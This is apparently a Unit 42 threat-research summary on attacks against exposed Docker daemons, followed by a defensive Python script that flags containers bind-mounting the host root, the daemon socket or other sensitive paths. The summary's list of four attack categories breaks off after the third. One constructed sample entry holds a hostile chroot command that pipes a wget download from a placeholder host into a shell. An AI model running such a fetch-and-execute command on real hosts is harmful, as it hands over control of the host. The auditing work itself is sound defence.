Attacker’s Tactics and Techniques in Unsecured Docker Daemons Revealed


Executive Summary


Between September and December 2019, Unit 42 researchers periodically scanned the internet for Docker hosts whose daemons were exposed (largely through inadvertent user error) and collected metadata from them. This research reveals some of the tactics and techniques attackers used on the compromised Docker engines. In total, 1,400 unsecured Docker hosts, 8,673 active containers, and 17,927 Docker images were found. Once Unit 42 alerted Docker to the operation, the Docker team worked quickly with Unit 42 to remove the malicious images.


Container technology has gained enormous popularity in the past few years and is becoming the de facto way to package, deliver, and deploy modern applications. As the technology evolves and is adopted quickly, it also becomes a valuable target for adversaries.


While the majority of the malicious activity was cryptojacking (mostly mining Monero), some compromised Docker engines were used to launch other attacks or to install rootkits on the hosts. Sensitive information, such as application credentials and infrastructure configuration, was also found in the exposed logs. One tactic we saw frequently was attackers mounting the entire host file system into a container and then reading from and writing to the host operating system (OS) from inside the container.


We organized the observed malicious activities into the four categories below and provide an overview of each category with real samples.


Deploy Container Images with Malicious Code. Malicious images are first pushed to a public registry. The images are then pulled and deployed on the unsecured Docker hosts.
Deploy Benign Container Images and Download Malicious Payloads at Run Time. Benign images are deployed on the Docker hosts. Malicious payloads are then downloaded and executed inside the benign containers.
Deploy Malicious Payloads on the Host. Adversaries mount the entire host file ..
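The host-mount tactic described above (a container that bind-mounts the host root filesystem, or the daemon socket, and then works on the host from inside the container) is visible in the daemon's own container listing. The audit script below is an added example written for this page; it is not Unit 42's tooling or code from the original article. It consumes the JSON that the Docker Engine API returns from `GET /containers/json` (the data behind `docker ps`). The entries in `SAMPLE_CONTAINERS` are constructed for the example, the function names are the example's own, and `SENSITIVE_HOST_PATHS` is an illustrative choice that a deployment would tune.

```python
"""Audit a Docker host's containers for host-escape footholds: bind mounts of
sensitive host paths (host root, daemon socket, /etc, /root, /home) and
privileged mode.

Added example, not Unit 42's tooling. Input is the JSON list returned by the
Docker Engine API from GET /containers/json; the sample below is constructed
for this example and does not come from a real host.
"""
import json

# Host paths whose bind mount hands a container read/write access to the host
# OS, to persistence locations (cron, SSH keys) or to the Docker daemon itself.
# Illustrative list (assumption of this example), not an exhaustive one.
SENSITIVE_HOST_PATHS = ("/", "/etc", "/root", "/home", "/var/run/docker.sock")

# Constructed sample in the shape of /containers/json entries. The fourth entry
# carries HostConfig.Privileged, which only `docker inspect`
# (GET /containers/{id}/json) reports, to show that check as well.
SAMPLE_CONTAINERS = json.loads("""
[
  {"Id": "4f9c0b3a2e1d7c6b5a4f3e2d1c0b9a8f7e6d5c4b3a2f1e0d9c8b7a6f5e4d3c2b",
   "Image": "alpine:latest",
   "Command": "chroot /mnt sh -c 'wget -qO- http://example.invalid/x.sh | sh'",
   "Mounts": [{"Type": "bind", "Source": "/", "Destination": "/mnt",
               "Mode": "", "RW": true}]},
  {"Id": "9e8d7c6b5a4f3e2d1c0b9a8f7e6d5c4b3a2f1e0d9c8b7a6f5e4d3c2b1a0f9e8d",
   "Image": "nginx:1.17",
   "Command": "nginx -g 'daemon off;'",
   "Mounts": [{"Type": "volume", "Name": "web",
               "Source": "/var/lib/docker/volumes/web/_data",
               "Destination": "/usr/share/nginx/html", "RW": true}]},
  {"Id": "1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d9e0f1a2b",
   "Image": "busybox:latest",
   "Command": "sh",
   "Mounts": [{"Type": "bind", "Source": "/var/run/docker.sock",
               "Destination": "/var/run/docker.sock", "Mode": "", "RW": true}]},
  {"Id": "7e6d5c4b3a2f1e0d9c8b7a6f5e4d3c2b1a0f9e8d7c6b5a4f3e2d1c0b9a8f7e6d",
   "Image": "ubuntu:18.04",
   "Command": "bash",
   "Mounts": [],
   "HostConfig": {"Privileged": true}}
]
""")


def sensitive_prefix(source):
    """Return the sensitive host path that `source` is or lives under, else None."""
    for path in SENSITIVE_HOST_PATHS:
        if path == "/":
            # Only an exact "/" is the host root; every path starts with "/".
            if source == "/":
                return path
        elif source == path or source.startswith(path + "/"):
            return path
    return None


def container_findings(container):
    """Reasons one container entry can reach the host; empty list if none."""
    reasons = []
    for mount in container.get("Mounts", []):
        # Named volumes live under /var/lib/docker and expose no host path;
        # only bind mounts map arbitrary host paths into the container.
        if mount.get("Type") != "bind":
            continue
        src = mount.get("Source", "")
        hit = sensitive_prefix(src)
        if hit is not None:
            mode = "rw" if mount.get("RW", True) else "ro"
            dst = mount.get("Destination")
            reasons.append(f"bind mount of host {src} at {dst} ({mode}, under {hit})")
    # Present only in inspect-style entries; a plain /containers/json listing
    # lacks HostConfig.Privileged, so this never fires on it.
    if container.get("HostConfig", {}).get("Privileged"):
        reasons.append("privileged container")
    return reasons


def audit(containers):
    """Return [(short id, image, reasons)] for every container that can reach the host."""
    results = []
    for c in containers:
        reasons = container_findings(c)
        if reasons:
            results.append((c.get("Id", "")[:12], c.get("Image", "?"), reasons))
    return results


if __name__ == "__main__":
    for short_id, image, reasons in audit(SAMPLE_CONTAINERS):
        print(f"{short_id} {image}")
        for r in reasons:
            print(f"    {r}")
```

On a real host, `curl --unix-socket /var/run/docker.sock http://localhost/containers/json` produces the input; the same Engine API is what an exposed daemon serves over TCP to anyone who can reach it, which is why the bind mount of `/` needs no exploit at all. To confirm the daemon itself is not reachable from the network, check that `dockerd` has no TCP listener in `ss -ltnp` output and that `/etc/docker/daemon.json` (or the systemd unit) does not set a `tcp://` host without TLS.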
